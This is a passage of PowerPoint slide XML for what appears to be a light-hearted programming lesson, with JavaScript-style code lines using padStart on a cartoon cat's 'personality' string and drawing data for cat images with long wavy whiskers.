              </a:rPr>
              <a:t> temp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat.personality</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err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hehe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>temp.padStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42</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a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"_.-."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</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005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-</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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat.personality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hehe</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005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UwU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Oh… oops…</a:t>
            </a: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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11" descr="Cartoon cat with heart and long sinusoidal whiskers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CA1C9F9-BA78-4524-45AF-7DC4DF211ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-412797" y="3727451"/>
            <a:ext cx="9223449" cy="1219200"/>
            <a:chOff x="-623455" y="3888094"/>
            <a:chExt cx="9223449" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="A cartoon cat with a heart">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF71ACAB-D6DF-2B5E-F15E-F1A1CA81FB6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7380794" y="3888094"/>
              <a:ext cx="1219200" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform: Shape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A685EA3-EB5C-4797-90C4-F2F8431F0B62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-623455" y="4298834"/>
              <a:ext cx="8004249" cy="629738"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 7079105 w 7079105"/>
                <a:gd name="connsiteY0" fmla="*/ 209951 h 629738"/>
                <a:gd name="connsiteX1" fmla="*/ 6974174 w 7079105"/>
                <a:gd name="connsiteY1" fmla="*/ 464783 h 629738"/>
                <a:gd name="connsiteX2" fmla="*/ 6809282 w 7079105"/>
                <a:gd name="connsiteY2" fmla="*/ 63797 h 629738"/>
                <a:gd name="connsiteX3" fmla="*/ 6640643 w 7079105"/>
                <a:gd name="connsiteY3" fmla="*/ 461036 h 629738"/>
                <a:gd name="connsiteX4" fmla="*/ 6486994 w 7079105"/>
                <a:gd name="connsiteY4" fmla="*/ 88 h 629738"/>
                <a:gd name="connsiteX5" fmla="*/ 6322102 w 7079105"/>
                <a:gd name="connsiteY5" fmla="*/ 461036 h 629738"/>
                <a:gd name="connsiteX6" fmla="*/ 6153462 w 7079105"/>
                <a:gd name="connsiteY6" fmla="*/ 88 h 629738"/>
                <a:gd name="connsiteX7" fmla="*/ 5943600 w 7079105"/>
                <a:gd name="connsiteY7" fmla="*/ 506006 h 629738"/>
                <a:gd name="connsiteX8" fmla="*/ 5733738 w 7079105"/>
                <a:gd name="connsiteY8" fmla="*/ 82534 h 629738"/>
                <a:gd name="connsiteX9" fmla="*/ 5606321 w 7079105"/>
                <a:gd name="connsiteY9" fmla="*/ 479774 h 629738"/>
                <a:gd name="connsiteX10" fmla="*/ 5373974 w 7079105"/>
                <a:gd name="connsiteY10" fmla="*/ 63797 h 629738"/>
                <a:gd name="connsiteX11" fmla="*/ 5164112 w 7079105"/>
                <a:gd name="connsiteY11" fmla="*/ 479774 h 629738"/>
                <a:gd name="connsiteX12" fmla="*/ 4972987 w 7079105"/>
                <a:gd name="connsiteY12" fmla="*/ 127505 h 629738"/>
                <a:gd name="connsiteX13" fmla="*/ 4849318 w 7079105"/>
                <a:gd name="connsiteY13" fmla="*/ 502259 h 629738"/>
                <a:gd name="connsiteX14" fmla="*/ 4572000 w 7079105"/>
                <a:gd name="connsiteY14" fmla="*/ 127505 h 629738"/>
                <a:gd name="connsiteX15" fmla="*/ 4362138 w 7079105"/>
                <a:gd name="connsiteY15" fmla="*/ 565967 h 629738"/>
                <a:gd name="connsiteX16" fmla="*/ 4111053 w 7079105"/>
                <a:gd name="connsiteY16" fmla="*/ 164980 h 629738"/>
                <a:gd name="connsiteX17" fmla="*/ 3938666 w 7079105"/>
                <a:gd name="connsiteY17" fmla="*/ 483521 h 629738"/>
                <a:gd name="connsiteX18" fmla="*/ 3728803 w 7079105"/>
                <a:gd name="connsiteY18" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX19" fmla="*/ 3473971 w 7079105"/>
                <a:gd name="connsiteY19" fmla="*/ 506006 h 629738"/>
                <a:gd name="connsiteX20" fmla="*/ 3305331 w 7079105"/>
                <a:gd name="connsiteY20" fmla="*/ 146242 h 629738"/>
                <a:gd name="connsiteX21" fmla="*/ 3095469 w 7079105"/>
                <a:gd name="connsiteY21" fmla="*/ 524744 h 629738"/>
                <a:gd name="connsiteX22" fmla="*/ 2926830 w 7079105"/>
                <a:gd name="connsiteY22" fmla="*/ 191213 h 629738"/>
                <a:gd name="connsiteX23" fmla="*/ 2694482 w 7079105"/>
                <a:gd name="connsiteY23" fmla="*/ 479774 h 629738"/>
                <a:gd name="connsiteX24" fmla="*/ 2548328 w 7079105"/>
                <a:gd name="connsiteY24" fmla="*/ 146242 h 629738"/>
                <a:gd name="connsiteX25" fmla="*/ 2338466 w 7079105"/>
                <a:gd name="connsiteY25" fmla="*/ 524744 h 629738"/>
                <a:gd name="connsiteX26" fmla="*/ 2128603 w 7079105"/>
                <a:gd name="connsiteY26" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX27" fmla="*/ 1873771 w 7079105"/>
                <a:gd name="connsiteY27" fmla="*/ 565967 h 629738"/>
                <a:gd name="connsiteX28" fmla="*/ 1768839 w 7079105"/>
                <a:gd name="connsiteY28" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX29" fmla="*/ 1431561 w 7079105"/>
                <a:gd name="connsiteY29" fmla="*/ 565967 h 629738"/>
                <a:gd name="connsiteX30" fmla="*/ 1244184 w 7079105"/>
                <a:gd name="connsiteY30" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX31" fmla="*/ 1011836 w 7079105"/>
                <a:gd name="connsiteY31" fmla="*/ 543482 h 629738"/>
                <a:gd name="connsiteX32" fmla="*/ 816964 w 7079105"/>
                <a:gd name="connsiteY32" fmla="*/ 191213 h 629738"/>
                <a:gd name="connsiteX33" fmla="*/ 607102 w 7079105"/>
                <a:gd name="connsiteY33" fmla="*/ 528492 h 629738"/>
                <a:gd name="connsiteX34" fmla="*/ 397239 w 7079105"/>
                <a:gd name="connsiteY34" fmla="*/ 164980 h 629738"/>
                <a:gd name="connsiteX35" fmla="*/ 164892 w 7079105"/>
                <a:gd name="connsiteY35" fmla="*/ 629675 h 629738"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 7079105"/>
                <a:gd name="connsiteY36" fmla="*/ 127505 h 6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9105" h="629738">
                  <a:moveTo>
                    <a:pt x="7079105" y="209951"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7049124" y="349546"/>
                    <a:pt x="7019144" y="489142"/>
                    <a:pt x="6974174" y="464783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6929204" y="440424"/>
                    <a:pt x="6864870" y="64421"/>
                    <a:pt x="6809282" y="63797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6753694" y="63173"/>
                    <a:pt x="6694358" y="471654"/>
                    <a:pt x="6640643" y="461036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6586928" y="450418"/>
                    <a:pt x="6540084" y="88"/>
                    <a:pt x="6486994" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6433904" y="88"/>
                    <a:pt x="6377691" y="461036"/>
                    <a:pt x="6322102" y="461036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6266513" y="461036"/>
                    <a:pt x="6216546" y="-7407"/>
                    <a:pt x="6153462" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6090378" y="7583"/>
                    <a:pt x="6013554" y="492265"/>
                    <a:pt x="5943600" y="506006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5873646" y="519747"/>
                    <a:pt x="5789951" y="86906"/>
                    <a:pt x="5733738" y="82534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5677525" y="78162"/>
                    <a:pt x="5666282" y="482897"/>
                    <a:pt x="5606321" y="479774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5546360" y="476651"/>
                    <a:pt x="5447675" y="63797"/>
                    <a:pt x="5373974" y="63797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5300273" y="63797"/>
                    <a:pt x="5230943" y="469156"/>
                    <a:pt x="5164112" y="479774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5097281" y="490392"/>
                    <a:pt x="5025453" y="123758"/>
                    <a:pt x="4972987" y="127505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4920521" y="131252"/>
                    <a:pt x="4916149" y="502259"/>
                    <a:pt x="4849318" y="502259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4782487" y="502259"/>
                    <a:pt x="4653197" y="116887"/>
                    <a:pt x="4572000" y="127505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4490803" y="138123"/>
                    <a:pt x="4438962" y="559721"/>
                    <a:pt x="4362138" y="565967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4285314" y="572213"/>
                    <a:pt x="4181632" y="178721"/>
                    <a:pt x="4111053" y="164980"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4040474" y="151239"/>
                    <a:pt x="4002374" y="482896"/>
                    <a:pt x="3938666" y="483521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3874958" y="484146"/>
                    <a:pt x="3806252" y="164980"/>
                    <a:pt x="3728803" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3651354" y="172475"/>
                    <a:pt x="3544550" y="509754"/>
                    <a:pt x="3473971" y="506006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3403392" y="502258"/>
                    <a:pt x="3368415" y="143119"/>
                    <a:pt x="3305331" y="146242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3242247" y="149365"/>
                    <a:pt x="3158553" y="517249"/>
                    <a:pt x="3095469" y="524744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032385" y="532239"/>
                    <a:pt x="2993661" y="198708"/>
                    <a:pt x="2926830" y="191213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2859999" y="183718"/>
                    <a:pt x="2757566" y="487269"/>
                    <a:pt x="2694482" y="479774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2631398" y="472279"/>
                    <a:pt x="2607664" y="138747"/>
                    <a:pt x="2548328" y="146242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2488992" y="153737"/>
                    <a:pt x="2408420" y="520996"/>
                    <a:pt x="2338466" y="524744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2268512" y="528492"/>
                    <a:pt x="2206052" y="161857"/>
                    <a:pt x="2128603" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2051154" y="175598"/>
                    <a:pt x="1933732" y="565967"/>
                    <a:pt x="1873771" y="565967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1813810" y="565967"/>
                    <a:pt x="1842541" y="168728"/>
                    <a:pt x="1768839" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1695137" y="168728"/>
                    <a:pt x="1519003" y="565967"/>
                    <a:pt x="1431561" y="565967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1344119" y="565967"/>
                    <a:pt x="1314138" y="172475"/>
                    <a:pt x="1244184" y="168728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1174230" y="164981"/>
                    <a:pt x="1083039" y="539735"/>
                    <a:pt x="1011836" y="543482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940633" y="547230"/>
                    <a:pt x="884420" y="193711"/>
                    <a:pt x="816964" y="191213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="749508" y="188715"/>
                    <a:pt x="677056" y="532864"/>
                    <a:pt x="607102" y="528492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537148" y="524120"/>
                    <a:pt x="470941" y="148116"/>
                    <a:pt x="397239" y="164980"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323537" y="181844"/>
                    <a:pt x="231098" y="635921"/>
                    <a:pt x="164892" y="629675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98685" y="623429"/>
                    <a:pt x="52466" y="144993"/>
                    <a:pt x="0" y="12750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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A cartoon cat with a heart">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA094C5C-64F7-A227-6882-D00012FA139D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591452" y="992718"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4151266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descr="A yellow cartoon cat with a crying face and long whiskers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67780BB-46E7-017A-5EA4-1349A71054DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-412797" y="3727451"/>
            <a:ext cx="9223449" cy="1219200"/>
            <a:chOff x="-1045489" y="3530650"/>
            <a:chExt cx="9223449" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8" descr="A yellow cat with a crying face">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1C5913-20B1-1026-8F15-C5779DCCD5C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="10000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6958760" y="3530650"/>
              <a:ext cx="1219200" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform: Shape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF09B4A0-05B8-E923-7D96-4DB223D9A20B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1045489" y="3866342"/>
              <a:ext cx="8004249" cy="629738"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 7079105 w 7079105"/>
                <a:gd name="connsiteY0" fmla="*/ 209951 h 629738"/>
                <a:gd name="connsiteX1" fmla="*/ 6974174 w 7079105"/>
                <a:gd name="connsiteY1" fmla="*/ 464783 h 629738"/>
                <a:gd name="connsiteX2" fmla="*/ 6809282 w 7079105"/>
                <a:gd name="connsiteY2" fmla="*/ 63797 h 629738"/>
                <a:gd name="connsiteX3" fmla="*/ 6640643 w 7079105"/>
                <a:gd name="connsiteY3" fmla="*/ 461036 h 629738"/>
                <a:gd name="connsiteX4" fmla="*/ 6486994 w 7079105"/>
                <a:gd name="connsiteY4" fmla="*/ 88 h 629738"/>
                <a:gd name="connsiteX5" fmla="*/ 6322102 w 7079105"/>
                <a:gd name="connsiteY5" fmla="*/ 461036 h 629738"/>
                <a:gd name="connsiteX6" fmla="*/ 6153462 w 7079105"/>
                <a:gd name="connsiteY6" fmla="*/ 88 h 629738"/>
                <a:gd name="connsiteX7" fmla="*/ 5943600 w 7079105"/>
                <a:gd name="connsiteY7" fmla="*/ 506006 h 629738"/>
                <a:gd name="connsiteX8" fmla="*/ 5733738 w 7079105"/>
                <a:gd name="connsiteY8" fmla="*/ 82534 h 629738"/>
                <a:gd name="connsiteX9" fmla="*/ 5606321 w 7079105"/>
                <a:gd name="connsiteY9" fmla="*/ 479774 h 629738"/>
                <a:gd name="connsiteX10" fmla="*/ 5373974 w 7079105"/>
                <a:gd name="connsiteY10" fmla="*/ 63797 h 629738"/>
                <a:gd name="connsiteX11" fmla="*/ 5164112 w 7079105"/>
                <a:gd name="connsiteY11" fmla="*/ 479774 h 629738"/>
                <a:gd name="connsiteX12" fmla="*/ 4972987 w 7079105"/>
                <a:gd name="connsiteY12" fmla="*/ 127505 h 629738"/>
                <a:gd name="connsiteX13" fmla="*/ 4849318 w 7079105"/>
                <a:gd name="connsiteY13" fmla="*/ 502259 h 629738"/>
                <a:gd name="connsiteX14" fmla="*/ 4572000 w 7079105"/>
                <a:gd name="connsiteY14" fmla="*/ 127505 h 629738"/>
                <a:gd name="connsiteX15" fmla="*/ 4362138 w 7079105"/>
                <a:gd name="connsiteY15" fmla="*/ 565967 h 629738"/>
                <a:gd name="connsiteX16" fmla="*/ 4111053 w 7079105"/>
                <a:gd name="connsiteY16" fmla="*/ 164980 h 629738"/>
                <a:gd name="connsiteX17" fmla="*/ 3938666 w 7079105"/>
                <a:gd name="connsiteY17" fmla="*/ 483521 h 629738"/>
                <a:gd name="connsiteX18" fmla="*/ 3728803 w 7079105"/>
                <a:gd name="connsiteY18" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX19" fmla="*/ 3473971 w 7079105"/>
                <a:gd name="connsiteY19" fmla="*/ 506006 h 629738"/>
                <a:gd name="connsiteX20" fmla="*/ 3305331 w 7079105"/>
                <a:gd name="connsiteY20" fmla="*/ 146242 h 629738"/>
                <a:gd name="connsiteX21" fmla="*/ 3095469 w 7079105"/>
                <a:gd name="connsiteY21" fmla="*/ 524744 h 629738"/>
                <a:gd name="connsiteX22" fmla="*/ 2926830 w 7079105"/>
                <a:gd name="connsiteY22" fmla="*/ 191213 h 629738"/>
                <a:gd name="connsiteX23" fmla="*/ 2694482 w 7079105"/>
                <a:gd name="connsiteY23" fmla="*/ 479774 h 629738"/>
                <a:gd name="connsiteX24" fmla="*/ 2548328 w 7079105"/>
                <a:gd name="connsiteY24" fmla="*/ 146242 h 629738"/>
                <a:gd name="connsiteX25" fmla="*/ 2338466 w 7079105"/>
                <a:gd name="connsiteY25" fmla="*/ 524744 h 629738"/>
                <a:gd name="connsiteX26" fmla="*/ 2128603 w 7079105"/>
                <a:gd name="connsiteY26" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX27" fmla="*/ 1873771 w 7079105"/>
                <a:gd name="connsiteY27" fmla="*/ 565967 h 629738"/>
                <a:gd name="connsiteX28" fmla="*/ 1768839 w 7079105"/>
                <a:gd name="connsiteY28" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX29" fmla="*/ 1431561 w 7079105"/>
                <a:gd name="connsiteY29" fmla="*/ 565967 h 629738"/>
                <a:gd name="connsiteX30" fmla="*/ 1244184 w 7079105"/>
                <a:gd name="connsiteY30" fmla="*/ 168728 h 629738"/>
                <a:gd name="connsiteX31" fmla="*/ 1011836 w 7079105"/>
                <a:gd name="connsiteY31" fmla="*/ 543482 h 629738"/>
                <a:gd name="connsiteX32" fmla="*/ 816964 w 7079105"/>
                <a:gd name="connsiteY32" fmla="*/ 191213 h 629738"/>
                <a:gd name="connsiteX33" fmla="*/ 607102 w 7079105"/>
                <a:gd name="connsiteY33" fmla="*/ 528492 h 629738"/>
                <a:gd name="connsiteX34" fmla="*/ 397239 w 7079105"/>
                <a:gd name="connsiteY34" fmla="*/ 164980 h 629738"/>
                <a:gd name="connsiteX35" fmla="*/ 164892 w 7079105"/>
                <a:gd name="connsiteY35" fmla="*/ 629675 h 629738"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 7079105"/>
                <a:gd name="connsiteY36" fmla="*/ 127505 h 629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9105" h="629738">
                  <a:moveTo>
                    <a:pt x="7079105" y="209951"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7049124" y="349546"/>
                    <a:pt x="7019144" y="489142"/>
                    <a:pt x="6974174" y="464783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6929204" y="440424"/>
                    <a:pt x="6864870" y="64421"/>
                    <a:pt x="6809282" y="63797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6753694" y="63173"/>
                    <a:pt x="6694358" y="471654"/>
                    <a:pt x="6640643" y="461036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6586928" y="450418"/>
                    <a:pt x="6540084" y="88"/>
                    <a:pt x="6486994" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6433904" y="88"/>
                    <a:pt x="6377691" y="461036"/>
                    <a:pt x="6322102" y="461036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6266513" y="461036"/>
                    <a:pt x="6216546" y="-7407"/>
                    <a:pt x="6153462" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
